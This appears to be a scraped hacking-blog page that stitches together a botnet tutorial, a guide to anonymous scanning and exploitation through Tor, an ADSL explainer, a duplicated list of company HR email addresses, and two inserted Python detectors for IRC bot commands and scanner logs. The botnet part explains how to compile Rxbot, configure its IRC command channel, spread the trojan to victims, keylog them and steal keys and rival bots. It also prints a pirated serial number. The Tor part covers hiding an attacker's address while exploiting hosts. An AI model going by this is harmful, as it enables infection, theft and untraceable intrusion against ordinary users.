How To Create And Compile Botnets To Autohack 1000ds of Systems

I found a nice tutorial that helps you with the basics of botnets.
In addition to the Rxbot 7.6 modded in this tutorial, you can also use another good source: rx-asn-2-re-worked v3, a stable mod of rxbot that is 100% functional and not crippled. If you want to download it, you can below:




Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.



Q: What is a botnet?

A: A botnet is where you send a trojan to someone and, when they open it, a "bot" joins your channel on IRC (secretly; they don't know this). Once done, the computer is referred to as a "zombie".

Depending on the source you used, the bot can do several things.

I myself have helped write one of the most advanced and secure bot sources out there.

(Off topic)

But once again depending on the source you can :

Keylog their computer, take pictures of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spam other irc channels and overrun a channel and even perform IRC "Takeovers".

Once again depending on the bot it may be able to kill other fellow competitor bots.

Or even kill AV/FW upon startup.

Add itself to registry.

Open sites.

Open commands.

Cmd,

notepad,

html,

Anything is possible !



There are the infected computers ("bots"), the attacker, the server, and the victim.



Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.



Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."




Botnets are being used for Google Adword click fraud, according to security watchers.



Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.

---------------

Ignore anything about using the server editor, but this tutorial shows how to make an irc channel and spread bots:




-----------------------------

Here we go ladies and gentlemen :)

Follow the tutorial:

-----------------------------



I. Setting up the C++ compiler: (easy)



1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)


Serial: 812-2224558



2. Run setup.exe and install. Remember to input serial



3. Download and install the Service Pack 6 (60.8 mb)



4. After that Download and install:



Windows SDK (1.2 mb)


-------------------------------------



II. Configuring the C++ compiler (easy)



1. Open up Microsoft Visual C++ Compiler 6.0

2. Go to Tools > Options and Click the "Directories" tab

3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB



4. Now put them in this order: (use up and down arrows)




(It does not matter what's below those lines.)

---------------------------------------



III. Configuring your bot: (easy)



1. Download and unpack:

Rxbot 7.6 (212.3 kb)




2. You should see an Rxbot 7.6 folder

3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:



Quote:
Put in quotations:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)

char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)

char serverpass[] = ""; // server password (not usually needed)

char channel[] = "#botz_channel"; // channel that the bot should join

char chanpass[] = "My_channel_pass"; // channel password



Optional:

char server2[] = ""; // backup server

char channel2[] = ""; // backup channel

char chanpass2[] = ""; //Backup channel pass



-----------------------------------

IV. Building your bot: (very easy)



1. Make sure Microsoft Visual C++ is open

2. Select "File > Open Workspace"

3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file

4. Right Click "rBot Files" and click Build:




5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!



YOU'RE DONE !!!! Now get the rbot and pack it (use the tool in the third post: open rbot and click "Protect") and send it to some idiots. Follow the tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P, but there are more ways. ENJOY !

-------------------------------------

Command list




Basics:

.login botpassword will login bots

.logout will logout bots

.keylog on will turn keylogger on

.getcdkeys will retrieve cdkeys.

Read command list for more
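
Seen from the network side, the commands listed above travel as ordinary RFC 1459 messages, so a sensor watching unencrypted IRC traffic can match them. The following is an added detection example, not part of the original tutorial or of any bot source; the capture lines, nicknames, hosts and channel names are constructed, and the command list is limited to the four commands named above.

```python
import re

# Operator commands named in the "Basics" list above (dot-prefixed on the wire).
C2_COMMANDS = ("login", "logout", "keylog", "getcdkeys")
COMMAND_RE = re.compile(r"^\.(%s)\b" % "|".join(C2_COMMANDS), re.IGNORECASE)


def parse_irc(line):
    """Split one RFC 1459 message into (prefix, command, params)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        head, _, trailing = line.partition(" :")
        parts = head.split() + [trailing]
    else:
        parts = line.split()
    if not parts:
        return None
    return prefix, parts[0].upper(), parts[1:]


def c2_findings(lines):
    """Flag channel messages and topics that begin with a known bot command.

    Only the command name is recorded; the argument (for .login, the bot
    password) is deliberately not copied into the alert.
    """
    findings = []
    for number, line in enumerate(lines, 1):
        msg = parse_irc(line)
        if msg is None:
            continue
        prefix, command, params = msg
        if command in ("PRIVMSG", "TOPIC") and len(params) >= 2:
            target, text = params[0], params[-1]
        elif command == "332" and len(params) >= 3:
            # RPL_TOPIC: <nick> <channel> :<topic>, sent to a client on join.
            target, text = params[1], params[-1]
        else:
            continue
        match = COMMAND_RE.match(text.strip())
        if match:
            findings.append({
                "line": number,
                "channel": target,
                "via": command,
                "command": match.group(1).lower(),
                "sender": (prefix or "").split("!")[0],
            })
    return findings


# Constructed capture: nicknames, hosts and channels are illustrative only.
SAMPLE_CAPTURE = [
    ":herder!u@203.0.113.5 PRIVMSG #example-chan :.login s3cret",
    ":herder!u@203.0.113.5 PRIVMSG #example-chan :.keylog on",
    ":alice!a@198.51.100.2 PRIVMSG #linux :try ./configure, then .login is not a thing",
    ":irc.example.net 332 bot123 #example-chan :.getcdkeys",
    ":herder!u@203.0.113.5 TOPIC #example-chan :.logout",
    "PING :irc.example.net",
    ":bob!b@198.51.100.3 PRIVMSG #linux :.loginfoo is not matched",
]

if __name__ == "__main__":
    for finding in c2_findings(SAMPLE_CAPTURE):
        print(finding)
```

Matching the topic numeric (332) as well as PRIVMSG matters because a client that joins a channel receives the current topic before anyone has typed anything.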

-----------------------------------


--------------------------------------------------------------------------------------------

How to secure your bots:



Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.

To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is excellent)

and update the channel topic and run:



The http://mybot.com is your bot's download link and the 82 can be any number(s)

Now steal their bots and have them join your channel ;)

To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.



To secure yourself:



It is fairly easy to secure your bots, here is how:



1. When you are in your channel, right-click on your chat window and select "Channel Modes"

2. Make sure these options are checked:






This way no one besides you or another op can set the channel topic :)

Note: Setting "Moderated" is good for when you are not there, because anyone who is not voiced (+v) or an op (+o) cannot talk. They will still log in and follow commands; however, there will be no output.

------------------------------------------------------------------------

Good IRC Servers:



I would recommend running your botnet on a private server.

If you would like to set up a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he knows that the IRC server is not doing anything illegal. If an admin refuses, don't get angry. It is his/her server after all.

How To perform Anonymous Port scanning using Nmap and Tor

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Web. It also lets developers and researchers build new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that let organizations and individuals share information over public networks without compromising their privacy.
The Onion Router (Tor) is an excellent piece of work towards defending online privacy. As with every debate about exploitation frameworks, security tools and vulnerability disclosure, such projects have also been the target of criticism and of debate about the abuse they may enable, the dangers of teaching individuals a dangerous and potentially illegal craft, and the 'secure' channel they offer for hiding an online presence. But let's face it, the bad guys already know about it (that is the reason they're bad, eh). Although these channels of misuse and abuse do exist and cannot be ignored, the merits will always outweigh the harm the black-hat community may cause.
Regrettably, in the country I live in, even most of the senior know-how people I meet, see or have a chance to work with don't have a clue about online privacy or the security of their information.
Privacy is every individual's right, and is as important as any other basic human need. You would seldom want somebody tracking your IP or spyware tracing your network activity, or, the next time you try to experiment with something, to receive an unpleasant little e-mail from an ISP admin saying that you were doing so-and-so. I am in no way TEMPTING you to do something wrong. It's all about your morals and motivation :). The small how-to below is a kick-starter for getting started with Tor and experimenting with some stuff securely. Interested? Move on, but don't go emailing me that stuff like this is illegal to post and ought to be removed.

The problem

A basic issue for the privacy-minded is that the recipient of your communication can see that you sent it by looking at the IP headers, or worse, trace the whole path. So can authorized intermediaries such as ISPs and government organizations, and sometimes unauthorized intermediaries as well. A very simple form of traffic analysis might involve sitting somewhere between sender and recipient on the network (man-in-the-middle) and looking at headers.
But there are also more powerful kinds of traffic analysis. Some attackers spy on multiple parts of the Web and use sophisticated statistical techniques to track the communication patterns of many different organizations and individuals. Encryption does not help against these attackers, since it only hides the content of Web traffic, not the headers (VPN? duh!!).

The solution:

A distributed, anonymous, secure network

Reducing the risks of both simple and sophisticated traffic analysis by distributing your web traffic over several servers, so that no single point can link you to your destination, helps defend your privacy. It's like taking a zig-zag, random, hard-to-follow path to throw off somebody who is tailing you (what the heroes usually do against the villain in action films :) ), then periodically erasing your footprints. Instead of taking a direct route from source to destination, data packets on Tor take a random pathway through several servers that cover your tracks, so no observer at any single point can tell where the data came from or where it is going.

Tor incrementally builds a circuit of encrypted connections through servers on the network. The circuit is extended one hop at a time, and each server along the way knows only which server gave it data and which server it is giving data to. No individual server ever knows the whole path that a data packet has taken. The client negotiates a separate set of encryption keys for each hop along the circuit to ensure that each hop cannot trace these connections as they pass through.
Once a circuit has been established, any data can be exchanged, and because each server sees no more than one hop in the circuit, neither an eavesdropper nor a compromised server can use traffic analysis to link the connection's source and destination.
Tor only works for TCP streams and can be used by any application with SOCKS support.
To experiment and write this small how-to, I set up a server on the Web that I wanted to scan from my home network using Nmap, Nessus and Metasploit from my BackTrack suite installed in a VM. Here are the steps I followed to launch the scan / exploitation through Tor:
A. Install Tor. Detailed instructions can be found on the website.
B. Download socat. This tool is an excellent multipurpose relay and lets me set up a local TCP listener that tunnels my connections through the Tor SOCKS server (listening on 9050).
Unfortunately socat is only available on BSD and *nix systems. To use Tor on Windows I would recommend using Privoxy, or better, installing the whole TorCP bundle.



Let us assume that the IP address of the host I wanted to scan was 202.163.97.20.
I invoked socat:
[talha@localhost#] ./socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:202.163.97.20:80,socksport=9050
The above command causes socat to listen on port 8080 and tunnel all incoming connections to 202.163.97.20 (port 80) through the Tor SOCKS server.

To do this on Windows you will need to:
1. Install Privoxy
2. Permit HTTP CONNECT requests on port 80 through your firewall
3. Browse to http://config.privoxy.org/show-status

C. I assume Nmap, Nessus and Metasploit are already installed and running. If not, you can find detailed instructions on their respective websites.

D. Launch an Nmap connect scan or a Nessus scan against 127.0.0.1 port 8080. Configure Nessus to limit the scan to port 8080 in the "Scan Options" tab.
Here are some of the entries in my Apache log that resulted from the scan:

212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /Album/ HTTP/1.1" 404 204 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 209 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /cgi-bin/wiki.pl? HTTP/1.1" 404 213 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

The 212.9.32.5 IP address represents the host that is the last onion router in the random circuit that was setup by the Tor program
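
For whoever operates the scanned server, the entries above are what to look for. The following is an added detection example (not from the original post) that parses Apache combined-format lines and flags a source either by scanner signature or by a burst of 404s on distinct paths; the first five sample lines are taken from the log excerpt above, the remaining lines are constructed, and the thresholds are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Signature visible in the excerpt: "Nessus" in the User-Agent and in a query string.
SCANNER_RE = re.compile(r"nessus", re.IGNORECASE)

# First five lines come from the log excerpt above; the rest are constructed.
SAMPLE_LOG = r'''
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
198.51.100.7 - - [10/Jul/2005:17:30:02 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; U; Linux i686)"
198.51.100.7 - - [10/Jul/2005:17:30:03 -0700] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; U; Linux i686)"
203.0.113.9 - - [10/Jul/2005:17:31:10 -0700] "GET /admin/ HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows; U)"
203.0.113.9 - - [10/Jul/2005:17:31:11 -0700] "GET /backup/ HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows; U)"
203.0.113.9 - - [10/Jul/2005:17:31:11 -0700] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows; U)"
203.0.113.9 - - [10/Jul/2005:17:31:12 -0700] "GET /test/ HTTP/1.1" 404 204 "-" "Mozilla/5.0 (Windows; U)"
203.0.113.9 - - [10/Jul/2005:17:31:13 -0700] "GET /old/ HTTP/1.1" 404 203 "-" "Mozilla/5.0 (Windows; U)"
'''


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    match = LOG_RE.match(line.strip())
    if not match:
        return None
    rec = match.groupdict()
    rec["status"] = int(rec["status"])
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_scanners(lines, window_seconds=10, min_404_paths=5):
    """Group requests by source and flag scanner signatures and 404 bursts."""
    window = timedelta(seconds=window_seconds)
    per_host = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_host[rec["host"]].append(rec)

    findings = {}
    for host, recs in per_host.items():
        recs.sort(key=lambda r: r["time"])
        reasons = []
        if any(SCANNER_RE.search(r["agent"]) or SCANNER_RE.search(r["path"]) for r in recs):
            reasons.append("scanner-signature")
        # Sliding window over 404s: most distinct missing paths seen inside the window.
        misses = [r for r in recs if r["status"] == 404]
        start, burst = 0, 0
        for end in range(len(misses)):
            while misses[end]["time"] - misses[start]["time"] > window:
                start += 1
            burst = max(burst, len({r["path"] for r in misses[start:end + 1]}))
        if burst >= min_404_paths:
            reasons.append("404-burst")
        if reasons:
            findings[host] = {
                "reasons": reasons,
                "max_distinct_404s": burst,
                "requests": len(recs),
            }
    return findings


if __name__ == "__main__":
    for host, info in find_scanners(SAMPLE_LOG.splitlines()).items():
        print(host, info)
```

The behavioural rule catches the constructed source that sends a browser-like User-Agent, which the signature alone would miss. As the post notes, the flagged address is the last relay of the circuit rather than the scanning machine, so treat it as evidence of a scan, not as attribution.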

Similarly, once you discover a vuln in a remote system, set up another instance of socat. Say, for simplicity, you are exploiting a web server (port 80).
[talha@localhost#] ./socat TCP4-LISTEN:1234,fork SOCKS4:127.0.0.1:202.163.97.20:80,socksport=9050
In Metasploit, when launching the exploit, set the target IP to 127.0.0.1 and the remote port to 1234. It's that simple, eh.
The above instructions may even be used to exploit program flaws in order to anonymously execute arbitrary commands on vulnerable hosts.



Some pieces of advice:
1. Nmap has scan types that generate packets through the raw packet interface, so those packets go directly to the target, not through Tor. For example:

A connect() scan (TCP) will work with Tor, but something like -sS connects directly to the target, revealing your true address.
2. Nmap and Nessus will often ping a target to see if it is up before doing a port scan. This is usually done with raw ICMP packets; ICMP won't traverse the Tor network (since it's not TCP) and will reveal your true address.
3. As used with socat, SOCKS4 does client-side DNS, so you resolve a target host name through DNS from your machine, not through the Tor network proxies.

Hence it is impossible to leak your source IP, because you tell your scanner to use 127.0.0.1 as the target IP. Therefore Nmap / Nessus has no host name to resolve, and if you forget to tell your scanner not to bother with ICMP pings, you will end up pinging yourself, not the target.

Staying anonymous

Tor cannot solve all anonymity problems. It focuses only on protecting the transport of data. You need to use protocol-specific support software if you don't want the sites you visit to see your identifying information. For example, you can use web proxies such as Privoxy and open relays while web browsing to block cookies and withhold information about your browser type.

Be smart. Don't provide your name or other revealing information in web forms. Be aware that, like all anonymizing networks that are fast enough for web browsing, Tor does not provide protection against end-to-end timing attacks: if your attacker can watch the traffic coming out of your computer and also the traffic arriving at your chosen destination, they can use statistical analysis to discover that they are part of the same circuit.
The Electronic Privacy Information Center (EPIC) maintains a comprehensive list that serves as a sampling of the best available privacy-enhancing tools.


What Is PPPoE and bridge mode of ADSL Modem

There are two ways to configure an ADSL modem for a broadband connection: PPPoE (Point-to-Point Protocol over Ethernet) mode and bridge mode.

PPPoE Mode



In this mode the modem works as a router and the PPPoE session terminates on the router's WAN port. The PPPoE client is built into the modem, and the IP address allocated by the BRAS server is assigned to the modem's WAN port. The internal network has to use private IP addresses, and NAT for Internet access happens in the modem. In PPPoE mode the user ID and password are stored inside the modem, and the Internet connection is established as soon as you switch the modem on.



Bridge Mode


In this mode the modem works as a transparent Ethernet bridge, so you need to run PPPoE client software (for login authentication) on your PC/server. Windows XP has this feature built in, but for other operating systems you need to buy it. Some freeware clients such as RASPPPoE, Enternet etc. are also available on the Internet.




Both modes can be used, depending on the requirement and application. The main differences are listed here.


PPPoE mode


1. User ID and password are stored inside the modem.
2. Multiple PCs can be connected. For example, most basic ADSL modems have at least one ADSL port and one USB port. In PPPoE mode you can connect one PC to the Ethernet port and one PC to the USB port, which allows simultaneous Internet usage on both PCs.
3. PPPoE mode is more secure.
4. For torrent downloads, the appropriate ports need to be forwarded.


Bridge Mode



1. In bridge mode the user ID and password are entered in the dialer on the computer.

2. Only a single PC can be connected.
3. For torrent downloads, port forwarding is not required.

4. Less secure, because all the ports are open; a good firewall is needed to avoid virus infection.

GET A JOB IN A COMPANY BY SENDING CV TO THESE EMAIL IDs (ONLY FOR INDIANS) [year 2010]

CLICK HERE TO SEARCH FOR A JOB YOU ARE INTERESTED IN. LIST OF SOFTWARE COMPANIES HR E-MAIL IDs WITHIN INDIA ARE 

INTEL npwhrindia@intel.com Bangalore 
 ORACLE naveen.vemula@oracle.com, suman.rajeev@oracle.com Bangalore 
 LUCENT hrindia@lucent.com Bangalore 
 SONY dreamjob@sisc.in.sony.com.sg Bangalore Singapore 
HUGHES hsshr@hss.hns.com Delhi Bangalore 
 NORTEL nadhr@nortelnetworks.com 
 TCS recruitment@blore.tcs.co.in Bangalore 
 Veritas bangalore@vxindia.veritas.com Unix Bangalore 
Aspect Dev jobs@india.aspectdv.com Ecom Bangalore
 MBT resume@mahindrabt.com Pune 
 HP resumes@india.hp.com Bangalore 
 HCL Tech rsriram@hclt.com 
 PENTAFOUR muralikrishna@pentafour.com 
NOVELL career@novell.com Bangalore 
 SUN careers@india.sun.com Bangalore 
 BPL Innovision - jobs@bplinnovision.com 
 D E Shaw - recruit-india@deshaw.com 
Hyderabad iCode - hr_india@icode.com 
 PTPL - prakash@ptpl.com 
InfoGain hrdindia@india.infogain.com 
Delhi Satyam globaltalent@bet.satyam.com Bangalore 
PSI resumes@psi.soft.net Bangalore 
 StumpVision stumpvision@blr.vsnl.net.in krish@stumpvision.com
 Infosys bangalore.hrd@inf.com 
Siemens hmsrecruit@sisl.co.in Bangalore 
 Wipro careers@wipro.com Bangalore 
American Data Solutions adsihr@gafri.com Bangalore 
Healtheon jobs@healtheonindia.com 
HCL Tech resumeblr@hclt.com 
 Bharti Telesoft careers@bhartitelesoft.com
 IBM osudar@in.ibm.com mamol@in.ibm.com 
 For Lucent skg@spectrumconsultants.com 
GE India itl.geitc@geind.ge.com Bangalore 
iCope hrd@icope.com 
Wireless NATIONAL careers@malkauns.nsc.com 
Embedded Philips pscareers2000@philips.com 
Embedded BOSCALLEO hr@boscalleo.com 
Ecomm IT Solutions careers_2000@its.soft.net 
HCL Tech careerb@msdc.hcltech.com 
NIHILENT career@nihilent.com 
Infosys careers@inf.com 
CISCO india_jobs@cisco.com 
Networking PEOPLE.COM speri@techpeople-india.com US NetBrahma Want2b@netbrahma.com Systems SunCoreSoft hrd@suncoresoft.com Ishoni jobs@ishoni.com LG Software I walkin@lgsi.com Ecom , Embedded HPS Global hps.rmg@hpsglobal.com Reliance , US jobs@reliance.com ESCOSOFT carer@escosoft-tech.com US SERANOVA careerindia@seraova.com Ecom TeleSoft hrd@indts.com Telecom SSI infinity@ssi-technologies.com Bangalore MelStar bstp@melstar.com Bombay Chennai USInteractive careers@usinteractive.com US Cerebra jobs@cerebracomputers.com Empowertel hrindia@empowertel.com PTC hrtoi@india.ptc.com PUNE Siri Technolgoies hr@siritech.com ALIT hr@alit.soft.net i-Flex sandeep.bhattacharya@iflexsolutions.com CosmoNet hrd@cosmonetsolutions.com POLARIS resume_toib@polaris.co.in RAS Infotech resumes@rasinfotech.com SIP Technolgies hrd@siptech.co.in SNS Tech careers@snstech.com AUTODESK crvcon@vsnl.com LGSoft onsite_java@lgsi.com Kindle work_here@kindlesystems.com PUNE US UK InfoStrands infostrands@gtvltd.com ObjectOrb hr@objectorb.com Comnet hrd@comneti.com telecom CIS hrtelecom@cisindia.com OnwardGroup geetha_cherian@onwardgroup.com Green Microsystems jobs@greenmicrosystems.com STPI personnel@stpb.soft.net Quark careers@quark.stpm.soft.net MOHALI DelDot subbu@deldot.com SUBEX ganesh@subegroup.com SIERRAOPT career@sierraopt.com DSQ recruit_ecom@md.in.dsqsoft.com CHENNAI IIC hr@iictechnologies.com CYBERTECH ecomjobs@cybertech.com FormulaSys resumes@FormulaSys.com US WorkFlow hr@workflow.com SystemLogic got2b@SystemLogic.com CyberAnalysts resume@cyberanalysts.com IMPETUS hr@impetus.co.in INDORE VISTEON svadivel@VISTEON.com EMBEDDED Amadee myjobs@amadee.de INTERNET WEBTEK webtek_jobs@dresdner-bank.com CIRRUS LOGIC hrd@cirrus.stpp.soft.net TCS Chennai resume@chennai.tcs.com TVSFUGEN mjojo@tvsfugen.com Onscan -Wireless - jobs@onscan.com EmbeddedWireless jobs@EmbeddedWireless.com DECCANET career@deccanetdesigns.com DuskValley joinus@DuskValley.comduskvalley@vsnl.com INTERNET SEMA hrd@sema.co.in 
CALCUTTA TElecom FTD future4u@ftdpl.com.sg DSP / Telecom SAS careers@sasi.com SPIKE design@spikeindia.soft.net EDA / ASIC HCL freedom@ggn.hcltech.com Aptech corporatetrg@aptech.co.in Datamatics psaib@datamatics.com BOMBAY AQUILA hrd@aquila.soft.net Graphics , EBusiness DATUM careers@datumtec.com HUGHES resumetoib@hss.hns.com AMBER india_jobs@ambernetworks.com Networking Integra career@integramicro.com Lante cvindia@lante.com DELHI -Ecom RELQ RELQusa@RELQ.com Sonata-US hrd@sonata-software.com areer@sonata-software.com ZAP hrdbg@skillsandjobs.com Zensar dreamcareers@zensar.com Spectrum , Singapore ravikum@mbox2.singnet.com.sg Forbes, UK forbeshr@bgl.vsnl.net.in forbesbg@bgl.vsnl.net.in Synopsys guru@synopsys.com JobCurry Australia map@jobcurry.com Singapore, UNIX cn66@vsnl.com Sun Tech US hr@suntechnologies.com HCL Tech - careers@noida.hclt.com Noida Infosys - engserv@inf.com HTC - htc.blr@htcinc.com CGSmith - resume@cgs.cgsmith.soft.net APCC - irecruit@apcc.com TechDrive sunitha@techdriveintl.com UniqueComputing careers@uniquecomputing.com US Accord Soft asiapacific@accord-soft.com ORACLE naveen.vemula@oracle.com, suman.rajeev@oracle.com LUCENT hrindia@lucent.com SONY dreamjob@sisc.in.sony.com.sg Bangalore Singapore HUGHES hsshr@hss.hns.com NORTEL nadhr@nortelnetworks.com TCS recruitment@blore.tcs.co.in Veritas bangalore@vxindia.veritas.com Aspect Dev jobs@india.aspectdv.com MBT resume@mahindrabt.com HP resumes@india.hp.com HCL Tech rsriram@hclt.com PENTAFOUR muralikrishna@pentafour.com NOVELL career@novell.com Bangalore SUN careers@india.sun.com Bangalore BPL Innovision – jobs@bplinnovision.com D E Shaw – recruit-india@deshaw.com Hyderabad iCode – hr_india@icode.com PTPL – prakash@ptpl.com InfoGain hrdindia@india.infogain.com Delhi Satyam globaltalent@bet.satyam.com Bangalore PSI resumes@psi.soft.net Bangalore StumpVision stumpvision@blr.vsnl.net.in krish@stumpvision.com Infosys bangalore.hrd@inf.com Siemens hmsrecruit@sisl.co.in Bangalore Wipro careers@wipro.com 
Bangalore American Data Solutions adsihr@gafri.com Bangalore Healtheon jobs@healtheonindia.com HCL Tech resumeblr@hclt.com Bharti Telesoft careers@bhartitelesoft.com IBM osudar@in.ibm.com mamol@in.ibm.com For Lucent skg@spectrumconsultants.com GE India itl.geitc@geind.ge.com Bangalore iCope hrd@icope.com Wireless NATIONAL careers@malkauns.nsc.com Embedded Philips pscareers2000@philips.com Embedded BOSCALLEO hr@boscalleo.com Ecomm IT Solutions careers_2000@its.soft.net HCL Tech careerb@msdc.hcltech.com NIHILENT career@nihilent.com Infosys careers@inf.com CISCO india_jobs@cisco.com Networking PEOPLE.COM speri@techpeople-india.com US NetBrahma Want2b@netbrahma.com Systems SunCoreSoft hrd@suncoresoft.com Ishoni jobs@ishoni.com LG Software I walkin@lgsi.com Ecom , Embedded HPS Global hps.rmg@hpsglobal.com Reliance , US jobs@reliance.com ESCOSOFT carer@escosoft-tech.com US SERANOVA careerindia@seraova.com Ecom TeleSoft hrd@indts.com Telecom SSI infinity@ssi-technologies.com Bangalore MelStar bstp@melstar.com Bombay Chennai USInteractive careers@usinteractive.com US Cerebra jobs@cerebracomputers.com Empowertel hrindia@empowertel.com PTC hrtoi@india.ptc.com PUNE Siri Technolgoies hr@siritech.com ALIT hr@alit.soft.net i-Flex sandeep.bhattacharya@iflexsolutions.com CosmoNet hrd@cosmonetsolutions.com POLARIS resume_toib@polaris.co.in RAS Infotech resumes@rasinfotech.com SIP Technolgies hrd@siptech.co.in SNS Tech careers@snstech.com AUTODESK crvcon@vsnl.com LGSoft onsite_java@lgsi.com Kindle work_here@kindlesystems.com PUNE US UK InfoStrands infostrands@gtvltd.com ObjectOrb hr@objectorb.com Comnet hrd@comneti.com telecom CIS hrtelecom@cisindia.com OnwardGroup geetha_cherian@onwardgroup.com Green Microsystems jobs@greenmicrosystems.com STPI personnel@stpb.soft.net Quark careers@quark.stpm.soft.net MOHALI DelDot subbu@deldot.com SUBEX ganesh@subegroup.com SIERRAOPT career@sierraopt.com DSQ recruit_ecom@md.in.dsqsoft.com CHENNAI IIC hr@iictechnologies.com CYBERTECH 
